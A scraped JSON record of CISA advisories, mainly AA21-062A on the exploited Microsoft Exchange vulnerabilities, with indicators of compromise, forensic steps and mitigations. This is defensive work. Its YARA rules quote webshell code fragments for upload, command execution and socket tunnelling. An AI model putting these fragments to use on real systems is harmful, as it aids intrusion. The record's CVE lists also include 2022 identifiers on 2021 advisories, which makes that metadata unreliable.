Infrastructure Security Agency (CISA)](<https://www.cisa.gov/>)\n\n[[6] United States Multi-State Information Sharing and Analysis Center (MS-ISAC)](<https://www.cisecurity.org/ms-isac/>)\n\n[[7] Accellion Press Release: Update to Recent FTA Security Incident ](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>)\n\n[[8] Accellion Press Release: Update to Recent FTA Security Incident](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>)\n\n[[9] Accellion Announcement: End-of-Life for Legacy FTA Software](<https://www.accellion.com/sites/default/files/resources/fta-eol.pdf>)\n\n### Revisions\n\nFebruary 24, 2021: Initial Version|June 17, 2021: Replaced STIX file to remove an IOC reported as non-malicious.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-17T12:00:00", "type": "ics", "title": "Exploitation of Accellion File Transfer Appliance", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", 
"CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-06-17T12:00:00", "id": "AA21-055A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-055a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:18:41", "description": "### Summary\n\n_Updated July 19, 2021: The U.S. Government attributes this activity to malicious cyber actors affiliated with the People's Republic of China (PRC) Ministry of State Security (MSS). Additional information may be found in a [statement from the White House](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/07/19/the-united-states-joined-by-allies-and-partners-attributes-malicious-cyber-activity-and-irresponsible-state-behavior-to-the-peoples-republic-of-china/>). For more information on Chinese malicious cyber activity, refer to [us-cert.cisa.gov/China](<https://us-cert.cisa.gov/china>)._\n\n_**Note:** This Alert was updated April 13, 2021, to provide further guidance. _\n\nCybersecurity and Infrastructure Security Agency (CISA) partners have observed active exploitation of vulnerabilities in Microsoft Exchange Server products. Successful exploitation of these vulnerabilities allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system. Successful exploitation may additionally enable the attacker to compromise trust and identity in a vulnerable network. Microsoft released out-of-band patches to address vulnerabilities in Microsoft Exchange Server. The vulnerabilities impact on-premises Microsoft Exchange Servers and are not known to impact Exchange Online or Microsoft 365 (formerly O365) cloud email services.\n\nThis Alert includes both tactics, techniques and procedures (TTPs) and the indicators of compromise (IOCs) associated with this malicious activity. 
To secure against this threat, CISA recommends organizations examine their systems for the TTPs and use the IOCs to detect any malicious activity. If an organization discovers exploitation activity, they should assume network identity compromise and follow incident response procedures. If an organization finds no activity, they should apply available patches immediately and implement the mitigations in this Alert.\n\nClick here for IOCs in STIX format.\n\n### Technical Details\n\n_(Updated April 14, 2021)_: [Microsoft's April 2021 Security Update](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Apr>) newly discloses and mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019.\n\nMicrosoft has released out-of-band security updates to address four vulnerabilities in Exchange Server:\n\n * [CVE-2021-26855](<https://vulners.com/cve/CVE-2021-26855>) allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read sensitive information.\n * [CVE-2021-26857](<https://vulners.com/cve/CVE-2021-26857>), [CVE-2021-26858](<https://vulners.com/cve/CVE-2021-26858>), and [CVE-2021-27065](<https://vulners.com/cve/CVE-2021-27065>) allow for remote code execution. \n * CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.\n\n * CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. 
An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as `SYSTEM` on the Exchange Server.\n\n * To locate a possible compromise of these CVEs, CISA encourages organizations to read the [Microsoft Advisory](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).\n\nIt is possible for an attacker, once authenticated to the Exchange server, to gain access to the Active Directory environment and download the Active Directory Database.\n\n_(Updated March 12, 2021):_ Microsoft Security Intelligence has released a [tweet](<https://twitter.com/MsftSecIntel/status/1370236539427459076>) on [DearCry](<https://www.bleepingcomputer.com/news/security/ransomware-now-attacks-microsoft-exchange-servers-with-proxylogon-exploits/>) ransomware being used to exploit compromised on-premises Exchange Servers. Ransomware infections can have negative consequences for an affected organization, including:\n\n * temporary or permanent loss of sensitive or proprietary information,\n * disruption to regular operations,\n * financial losses incurred to restore systems and files, and\n * potential harm to an organization\u2019s reputation.\n\n_(Updated April 12, 2021):_ CISA recommends organizations review Malware Analysis Report (MAR) [MAR-10330097-1.v1 \u2013 DearCry Ransomware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102b>) for detailed analysis, along with TTPs and IOCs.\n\n_(Updated March 12, 2021):_ CISA encourages organizations to review CISA\u2019s [Ransomware web page](<https://www.cisa.gov/ransomware>) for guidance and resources. 
Victims of ransomware should report it immediately to CISA at [www.us-cert.gov/report](<https://www.us-cert.gov/report>), a local [FBI Field Office](<https://www.fbi.gov/contact-us/field-offices>), or [Secret Service Field Office](<http://www.secretservice.gov/contact/field-offices/>).\n\n### Tactics, Techniques and Procedures\n\n_(Updated March 10, 2021):_ Microsoft has released a script that scans Exchange log files for IOCs. CISA strongly encourages organizations to run the [Test-ProxyLogon.ps1 script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>)\u2014as soon as possible\u2014to help determine whether their systems are compromised.\n\n_(Updated March 16, 2021):_ **Note:** Microsoft has released the [Exchange On-premises Mitigation Tool (EOMT.ps1)](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that can automate portions of both the detection and patching process. Microsoft stated the following along with the release: \"[the tool is intended] to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d Review the [EOMT.ps1 blog post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) for directions on using the tool.\n\n_(Updated March 10, 2021):_ CISA recommends investigating for signs of a compromise from at least January 1, 2021 through the present.\n\n_(Updated April 12, 2021):_ CISA has identified 10 webshells associated with this activity. This is not an all-inclusive list of webshells that are being leveraged by actors. 
CISA recommends organizations review the following MARs for detailed analysis of the 10 webshells, along with TTPs and IOCs. These MARs include CISA-developed YARA rules to help network defenders detect associated malware.\n\n 1. AR21-072A: [MAR-10328877.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072a>)\n 2. AR21-072B: [MAR-10328923.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072b>)\n 3. AR21-072C: [MAR-10329107.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072c>)\n 4. AR21-072D: [MAR-10329297.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072d>)\n 5. AR21-072E: [MAR-10329298.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072e>)\n 6. AR21-072F: [MAR-10329301.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072f>)\n 7. AR21-072G: [MAR-10329494.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072g>)\n 8. AR21-084A: [MAR-10329496-1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-084a>)\n 9. AR21-084B: [MAR-10329499-1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-084b>)\n 10. AR21-102A: [MAR-10331466-1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102a>)\n\n_(Updated March 13, 2021):_ A webshell is a script that can be uploaded to a compromised Microsoft Exchange Server to enable remote administration of the machine. 
Webshells are utilized for the following purposes:\n\n * To harvest and exfiltrate sensitive data and credentials;\n * To upload additional malware for the potential of creating, for example, a watering hole for infection and scanning of further victims;\n * To use as a relay point to issue commands to hosts inside the network without direct internet access;\n * To use as command-and-control infrastructure, potentially in the form of a bot in a botnet or in support of compromises to additional external networks. This could occur if the adversary intends to maintain long-term persistence.\n\n_(Updated March 13, 2021):_ For more information, see [TA15-314A Compromised Web Servers and Web Shells - Threat Awareness and Guidance](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A>).\n\nThe majority of the TTPs in this section are sourced from a [blog post from Volexity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>), a third-party cybersecurity firm. **Note:** the United States Government does not endorse any commercial product or service, including any subjects of analysis. 
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.\n\nVolexity has observed the following files as targets of `HTTP POST` requests:\n\n * `/owa/auth/Current/themes/resources/logon.css`\n * `/owa/auth/Current/themes/resources/owafont_ja.css`\n * `/owa/auth/Current/themes/resources/lgnbotl.gif`\n * `/owa/auth/Current/themes/resources/owafont_ko.css`\n * `/owa/auth/Current/themes/resources/SegoeUI-SemiBold.eot`\n * `/owa/auth/Current/themes/resources/SegoeUI-SemiLight.ttf`\n\nAdministrators should search the ECP server logs for the following string (or something similar):\n\n`S:CMD=Set-OabVirtualDirectory.ExternalUrl='`\n\nThe logs can be found at `<exchange install path>\\Logging\\ECP\\Server\\`.\n\nTo determine possible webshell activity, administrators should search for `.aspx` files in the following paths:\n\n * `\\inetpub\\wwwroot\\aspnet_client\\` (any `.aspx` file under this folder or subfolders)\n * `\\<exchange install path>\\FrontEnd\\HttpProxy\\ecp\\auth\\` (any file besides `TimeoutLogoff.aspx`)\n * `\\<exchange install path>\\FrontEnd\\HttpProxy\\owa\\auth\\` (any file or modified file that is not part of a standard install)\n * `\\<exchange install path>\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\` (any `.aspx` file in this folder or subfolders)\n * `\\<exchange install path>\\FrontEnd\\HttpProxy\\owa\\auth\\<folder with version number>\\` (any `.aspx` file in this folder or subfolders)\n\nAdministrators should search in the `/owa/auth/Current` directory for the following non-standard web log user-agents. 
These agents may be useful for incident responders to look at to determine if further investigation is necessary.\n\nThese should not be taken as definitive IOCs:\n\n * `DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html)`\n * `facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)`\n * `Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)`\n * `Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm)`\n * `Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html`\n * `Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)`\n * `Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)`\n * `Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)`\n * `Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36`\n\nVolexity observed these user-agents in conjunction with exploitation to `/ecp/` URLs:\n\n * `ExchangeServicesClient/0.0.0.0`\n * `python-requests/2.19.1`\n * `python-requests/2.25.1`\n\nThese user-agents were also observed having connections to post-exploitation webshell access:\n\n * `antSword/v2.1`\n * `Googlebot/2.1+(+http://www.googlebot.com/bot.html)`\n * `Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)`\n\nAs with the non-standard user-agents, responders can examine Internet Information Services (IIS) logs from Exchange Servers to identify possible historical activity. Also, as with the non-standard user-agents, these should not be taken as definitive IOCs:\n\n * `POST /owa/auth/Current/`\n * `POST /ecp/default.flt`\n * `POST /ecp/main.css`\n * `POST /ecp/<single char>.js`\n\nVolexity has seen attackers leverage the following IP addresses. 
Although these are tied to virtual private servers (VPSs) and virtual private networks (VPNs), responders should investigate these IP addresses on their networks and act accordingly.\n\nVolexity has also provided the following YARA signatures that can be run within your network to assist in finding signs of a compromise.\n\nrule webshell_aspx_simpleseesharp : Webshell Unclassified \n{ \nmeta: \nauthor = \"threatintel@volexity.com\" \ndate = \"2021-03-01\" \ndescription = \"A simple ASPX Webshell that allows an attacker to write further files to disk.\" \nhash = \"893cd3583b49cb706b3e55ecb2ed0757b977a21f5c72e041392d1256f31166e2\" \n \nstrings: \n$header = \"<%@ Page Language=\\\"C#\\\" %>\" \n$body = \"<% HttpPostedFile thisFile = Request.Files[0];thisFile.SaveAs(Path.Combine\" \n \ncondition: \n$header at 0 and \n$body and \nfilesize < 1KB \n} \n \nrule webshell_aspx_reGeorgTunnel : Webshell Commodity \n{ \nmeta: \nauthor = \"threatintel@volexity.com\" \ndate = \"2021-03-01\" \ndescription = \"A variation on the reGeorg tunnel webshell\" \nhash = \"406b680edc9a1bb0e2c7c451c56904857848b5f15570401450b73b232ff38928\" \nreference = \"https://github.com/sensepost/reGeorg/blob/master/tunnel.aspx\" \n \nstrings: \n$s1 = \"System.Net.Sockets\" \n$s2 = \"System.Text.Encoding.Default.GetString(Convert.FromBase64String(StrTr(Request.Headers.Get\" \n// a bit more experimental \n$t1 = \".Split('|')\" \n$t2 = \"Request.Headers.Get\" \n$t3 = \".Substring(\" \n$t4 = \"new Socket(\" \n$t5 = \"IPAddress ip;\" \n \ncondition: \nall of ($s*) or \nall of ($t*) \n} \n \nrule webshell_aspx_sportsball : Webshell Unclassified \n{ \nmeta: 
\nauthor = \"threatintel@volexity.com\" \ndate = \"2021-03-01\" \ndescription = \"The SPORTSBALL webshell allows attackers to upload files or execute commands on the system.\" \nhash = \"2fa06333188795110bba14a482020699a96f76fb1ceb80cbfa2df9d3008b5b0a\" \n \nstrings: \n$uniq1 = \"HttpCookie newcook = new HttpCookie(\\\"fqrspt\\\", HttpContext.Current.Request.Form\" \n$uniq2 = \"ZN2aDAB4rXsszEvCLrzgcvQ4oi5J1TuiRULlQbYwldE=\" \n \n$var1 = \"Result.InnerText = string.Empty;\" \n$var2 = \"newcook.Expires = DateTime.Now.AddDays(\" \n$var3 = \"System.Diagnostics.Process process = new System.Diagnostics.Process();\" \n$var4 = \"process.StandardInput.WriteLine(HttpContext.Current.Request.Form[\\\"\" \n$var5 = \"else if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form[\\\"\" \n$var6 = \"<input type=\\\"submit\\\" value=\\\"Upload\\\" />\" \n \ncondition: \nany of ($uniq*) or \nall of ($var*) \n}\n\nA list of webshell hashes has also been provided by Microsoft.\n\n**Note:** this is not an all-inclusive list of indicators of compromise, and threat actors have been known to use short-term leased IP addresses that change very frequently. Organizations that do not locate any of the IOCs in this Alert within their network traffic may nevertheless have been compromised. 
CISA recommends following the guidance located in the [Microsoft Advisory](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) to check your servers for any signs of a compromise. \n\n### Conduct Forensic Analysis\n\nShould your organization see evidence of compromise, your incident response should begin with conducting forensic analysis to collect artifacts and perform triage. Please see the following list of recommendations on how to conduct forensic analysis using various tools.\n\nAlthough the following free tools are not endorsed by the Federal Government, incident responders commonly use them to perform forensics.\n\nWhile collecting artifacts to perform triage, use processes and tools that minimize the alteration of the data being collected and that minimize impact to the operating system itself.\n\nIdeally, during data collection, store the data on removable/external media and, when possible, run the artifact collection tools from the same media.\n\nKey artifacts for triage that should be collected:\n\n * Memory\n * All registry hives\n * All Windows event logs\n * All web logs\n\nMemory can be collected with a variety of open source tools (e.g., FTK Imager by AccessData, Ram Capture by Belkasoft).\n\nRegistry and Windows Event logs can be collected with a variety of open source tools as well (e.g., FTK Imager, Kroll Artifact Parser And Extractor [KAPE]).\n\nWeb logs can also be collected with a variety of open source tools (e.g., FTK Imager).\n\n#### **Windows Artifact Collection Guide**\n\nExecute the following steps in order.\n\n**1) Download the latest FTK Imager** from <https://accessdata.com/product-download/>.\n\n * **Note:** Ensure your review of and compliance with the applicable license associated with the product referenced, which can be found in the product\u2019s User Guide. The United States Government does not endorse any commercial product or service, including any subjects of analysis. 
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.\n\n**2) Collect memory from the live system using FTK Imager.** See Memory Capture with FTK Imager.pdf for instructions. Note: Download and copy the \u201cFTK Imager\u201d folder to an external drive. Run FTK Imager.exe from the FTK Imager folder on the external drive. Wait until memory collection is complete before proceeding to the next step.\n\n**3) Collect important system artifacts using KAPE.** See KAPE Collection Procedure. Note: Download KAPE from a separate system; do not download KAPE to the target system. Run KAPE from the external drive.\n\n**4) Collect disk image using FTK Imager.** See Live Image with FTK Imager.pdf for instructions. **Note:** Run FTK Imager.exe from the \u201cFTK Imager\u201d folder on the external drive.\n\n#### **Memory Capture with FTK Imager**\n\n**1) Open FTK Imager.** Log into the system with Administrator privileges and launch \u201cFTK Imager.\u201d\n\n * **Note:** Ensure your review of and compliance with the applicable license associated with the product referenced. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.\n\n**2) Open \u201cCapture Memory.\u201d** Select \u201cCapture Memory\u2026\u201d from the File menu.\n\n\n\n_Figure 1: FTK Imager \u2013 Capture Memory Command_\n\n**3) Select Path and Filenames.** On the window that appears, use the \u201cBrowse\u201d button to identify the destination of the memory capture. Save the memory capture to an external device and not the main hard drive of the system. 
Doing so will prevent the saved file from overwriting any data space on the system.\n\n * Name the destination file with a descriptive name (e.g., the hostname of the system).\n * Select the box \u201cInclude pagefile\u201d and provide a name for the pagefile that is descriptive of the system.\n * Do not select \u201cCreate AD1 file.\u201d\n\n\n\n_Figure 2: FTK Imager \u2013 Memory Capture_\n\n**4) Capture Memory.** Click on \u201cCapture Memory\u201d to begin the capture process. The process will take several minutes depending on the size of the pagefile and the amount of memory on the system.\n\n\n\n_Figure 3: FTK Imager \u2013 Capture Process_\n\n#### **KAPE Collection Procedure [[1](<https://ericzimmerman.github.io/KapeDocs/#!Pages%5C2.-Getting-started.md>)]**\n\n1) Download KAPE from <https://www.kroll.com/en/services/cyber-risk/investigate-and-respond/kroll-artifact-parser-extractor-kape>.\n\n2) Disable any antivirus or host protection mechanisms that prevent execution from removable media, or data loss prevention (DLP) mechanisms that restrict utilization of removable media.\n\n * Enable antivirus and host protection once this process is completed.\n\n3) Unzip Kape.zip and run gkape.exe as admin from your removable media.\n\n4) **Target source** should be the drive on which the OS resides, typically C:.\n\n5) **Target destination** should be an external drive folder, not the same drive as the **Target source**. If available, use an external hard drive or flash drive.\n\n * A KAPE execution with these parameters will typically produce output artifacts with a total size of 1-25 GB.\n * If you are going to be running KAPE on different machines and want to save to the same drive, ensure the Target destination folder is unique for each execution of KAPE.\n\n6) Uncheck the **Flush** checkbox (it is checked by default).\n\n7) Check the **Add %d** and **Add %m** checkboxes.\n\n8) Select ALL checkboxes to ensure KAPE will target all available data that it is capable of targeting. 
This takes some time; use the down arrow and space bar to move through the list quickly.\n\n9) Check the **Process VSCs** checkbox.\n\n10) Select the **Zip** radio button and add Base name TargetOutput.\n\n11) Ensure the **Deduplicate** checkbox is checked (it is checked by default).\n\n * At the bottom you should now see a large Current command line, similar to:\n\n.\\kape.exe --tsource C: --tdest E:\\%d%m --tflush --target !BasicCollection,!SANS_Triage,Avast,AviraAVLogs,Bitdefender,ComboFix,ESET,FSecure,HitmanPro,Malwarebytes,McAfee,McAfee_ePO,RogueKiller,SentinelOne,Sophos,SUPERAntiSpyware,Symantec_AV_Logs,TrendMicro,VIPRE,Webroot,WindowsDefender,Ammyy,AsperaConnect,BoxDrive,CiscoJabber,CloudStorage,ConfluenceLogs,Discord,Dropbox,Exchange,ExchangeClientAccess,ExchangeTransport,FileZilla,GoogleDrive,iTunesBackup,JavaWebCache,Kaseya,LogMeIn,Notepad++,OneDrive,OutlookPSTOST,ScreenConnect,Skype,TeamViewerLogs,TeraCopy,VNCLogs,Chrome,ChromeExtensions,Edge,Firefox,InternetExplorer,WebBrowsers,ApacheAccessLog,IISLogFiles,ManageEngineLogs,MSSQLErrorLog,NGINXLogs,PowerShellConsole,KapeTriage,MiniTimelineCollection,RemoteAdmin,VirtualDisks,Gigatribe,TorrentClients,Torrents,$Boot,$J,$LogFile,$MFT,$SDS,$T,Amcache,ApplicationEvents,BCD,CombinedLogs,EncapsulationLogging,EventLogs,EventLogs-RDP,EventTraceLogs,EvidenceOfExecution,FileSystem,GroupPolicy,LinuxOnWindowsProfileFiles,LnkFilesAndJumpLists,LogFiles,MemoryFiles,MOF,OfficeAutosave,OfficeDocumentCache,Prefetch,RDPCache,RDPLogs,RecentFileCache,Recycle,RecycleBin,RecycleBinContent,RecycleBinMetadata,RegistryHives,RegistryHivesSystem,RegistryHivesUser,ScheduledTasks,SDB,SignatureCatalog,SRUM,StartupInfo,Syscache,ThumbCache,USBDevicesLogs,WBEM,WER,WindowsFirewall,WindowsIndexSearch,WindowsNotifcationsDB,WindowsTimeline,XPRestorePoints --vss --zip TargetOutput --gui\n\n * In the bottom right corner, click the **Execute!** button.
\n * The screenshot below shows `gkape.exe` during execution; you will also see a command window execute. **Note:** KAPE usually takes less than 20 minutes to complete on a workstation; if it is taking significantly longer, there may be an issue.\n\n\n\n_Figure 4: gkape.exe screenshot_\n\n### Mitigations\n\nCISA strongly recommends organizations read [Microsoft\u2019s advisory](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and [security blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) for more information on how to look for this malicious activity and to apply critical patches as soon as possible.\n\n_(Updated March 4, 2021):_ CISA is aware of threat actors using open source tools to search for vulnerable Microsoft Exchange Servers. This particular type of attack is scriptable, allowing attackers to easily exploit vulnerabilities through automated mechanisms. CISA advises all entities to patch as soon as possible to avoid being compromised. \n\n_(Updated March 4, 2021):_ From [Microsoft's patch release](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>), the security updates are available for the following Exchange Server versions:\n\n * Exchange Server 2010 (update requires SP 3 or any SP 3 RU \u2013 this is a Defense in Depth update)\n * Exchange Server 2013 (update requires CU 23)\n * Exchange Server 2016 (update requires CU 19 or CU 18)\n * Exchange Server 2019 (update requires CU 8 or CU 7)\n\n_(Updated March 4, 2021):_ If you are running an older CU than what the patch will accept, you must upgrade to at least the required CU as stated above and then apply the patch. \n\n_(Updated March 4, 2021):_ All patches must be applied using administrator privileges. 
\n\n\n_(Updated March 5, 2021)_: If patching is not an immediate option, CISA strongly recommends following alternative mitigations found in [Microsoft\u2019s blog on Exchange Server Vulnerabilities Mitigations](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>). However, these options should only be used as a temporary solution, not a replacement for patching. Additionally, there are other mitigation options available. CISA recommends limiting or blocking external access to internet-facing Exchange Servers via the following:\n\n * Restrict untrusted connections to port 443, or set up a VPN to separate the Exchange Server from external access; note that this will not prevent an adversary from exploiting the vulnerability if the attacker is already in your network.\n * Block external access to on-premises Exchange: \n * Restrict external access to OWA URL: `/owa/`. \n * Restrict external access to Exchange Admin Center (EAC) aka Exchange Control Panel (ECP) URL: `/ecp/`.\n\n * _(Updated March 4, 2021):_ Disconnect vulnerable Exchange servers from the internet until a patch can be applied.\n\nCISA would like to thank Microsoft and Volexity for their contributions to this Alert.\n\n### Resources\n\n * (Updated April 14, 2021) **Microsoft's April 2021 Security Update** that mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019.\n * _(Updated March 12, 2021)_ [Check my OWA](<https://checkmyowa.unit221b.com/>) tool for checking if a system has been affected. _**Disclaimer:** this tool does not check against an exhaustive list of compromised domains. It is meant for informational purposes only. 
The United States Government does not provide any warranties of any kind regarding this information and cannot assure its accuracy or completeness; therefore, entities should not rely solely on this information to justify foregoing CISA\u2019s recommendations for action described on this webpage._\n * Microsoft Advisory: <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * Microsoft Security Blog - Hafnium targeting Exchange Servers: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>\n * Volexity Blog: <https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>\n * Microsoft\u2019s blog on Exchange Server Vulnerabilities Mitigations: <https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>\n\n### References\n\n[Eric Zimmerman: KAPE Documentation](<https://ericzimmerman.github.io/KapeDocs/#!Pages%5C2.-Getting-started.md>)\n\n[Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities](<https://cyber.dhs.gov/ed/21-02/>)\n\n[Supplemental Direction V1 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities](<https://cyber.dhs.gov/ed/21-02/#supplemental-direction>)\n\n[Supplemental Direction V2 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities](<https://cyber.dhs.gov/ed/21-02/#supplemental-direction-v2>)\n\n### Revisions\n\nMarch 3, 2021: Initial Version|March 4, 2020: Updated Mitigations and Technical Details sections|March 5, 2021: Updated Mitigations Guidance from Microsoft|March 10, 2021: Updated TTP Section|March 12, 2021: Updated Resources Section|March 12, 2021: Added information on DearCry Ransomware|March 13, 2021: Added seven China Chopper Webshell MARs|March 14, 2021: Updated information on DearCry Ransomware|March 16, 2021: Added information on EOMT 
tool|March 25, 2021: Added two China Chopper Webshell MARs|March 25, 2021: Updated MARs to include YARA Rules|March 31, 2021: Added links to ED 21-02 and ED 21-02 Supplemental Direction|April 12, 2021: Added one China Chopper Webshell MAR and one DearCry Ransomware MAR|April 13, 2021: Added links to Microsoft's April 2021 Security Update and ED 21-02 Supplemental Direction V2|April 14, 2021: Added Exchange Server 2013 to list of on-premises Exchange Servers affected by the vulnerabilities disclosed on April 13, 2021.|July 19, 2021: Added attribution note\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T12:00:00", "type": "ics", "title": "Mitigate Microsoft Exchange Server Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-07-19T12:00:00", "id": "AA21-062A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T19:53:41", "description": 
